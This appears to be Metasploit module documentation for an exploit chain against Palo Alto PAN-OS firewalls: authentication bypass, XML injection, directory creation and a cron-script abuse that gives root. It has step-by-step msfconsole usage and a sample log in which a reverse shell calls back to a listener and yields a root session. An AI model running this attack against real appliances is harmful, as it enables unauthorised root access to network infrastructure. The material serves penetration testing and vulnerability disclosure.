## Description

This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the target appliance. The cron job used for the final
payload runs every 15 minutes by default and exploitation can take up to 20 minutes.

## Vulnerable Application

This exploit was specifically written against PAN-OS 7.1.0 running in a QEMU (kvm) virtual machine.
This VM is not generally available, but the specific disk image used was `PA-VM-KVM-7.1.0.qcow2`.


## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/panos_readsessionvars```
3. ```set RHOST [IP]```
4. ```exploit```
5. You should get a session (eventually)

## Options

**CBHOST** The callback listener address if the default is not accurate (port forwarding, etc)

**CBPORT** The callback listener port


## Scenarios

```
msf exploit(linux/http/panos_readsessionvars) > exploit

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Creating our corrupted session ID...
[*] Verifying that we can access the debug console with our corrupted session ID...
[*] Calling Administrator.get to create directory under /opt/pancfg/mgmt/logdb/config/1/...
[*] Waiting up to 20 minutes for the cronjob to fire and execute...
[*] Waiting for a session, 1200 seconds left...
[*] Waiting for a session, 1169 seconds left...
[*] Waiting for a session, 1138 seconds left...
[*] Waiting for a session, 1107 seconds left...
[*] Waiting for a session, 1076 seconds left...
[*] Waiting for a session, 1044 seconds left...
[*] Waiting for a session, 1013 seconds left...
[*] Waiting for a session, 982 seconds left...
[*] Waiting for a session, 951 seconds left...
[*] Waiting for a session, 920 seconds left...
[+] Sending payload of 67 bytes to 192.168.122.98:39499...
[*] Command shell session 7 opened (192.168.122.1:4444 -> 192.168.122.98:44858) at 2018-05-05 15:45:02 -0500
[!] Remember to manually purge the base directory: 'rm -rf /opt/pancfg/mgmt/logdb/config/1/'
[*] Shutting down payload stager listener...

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```
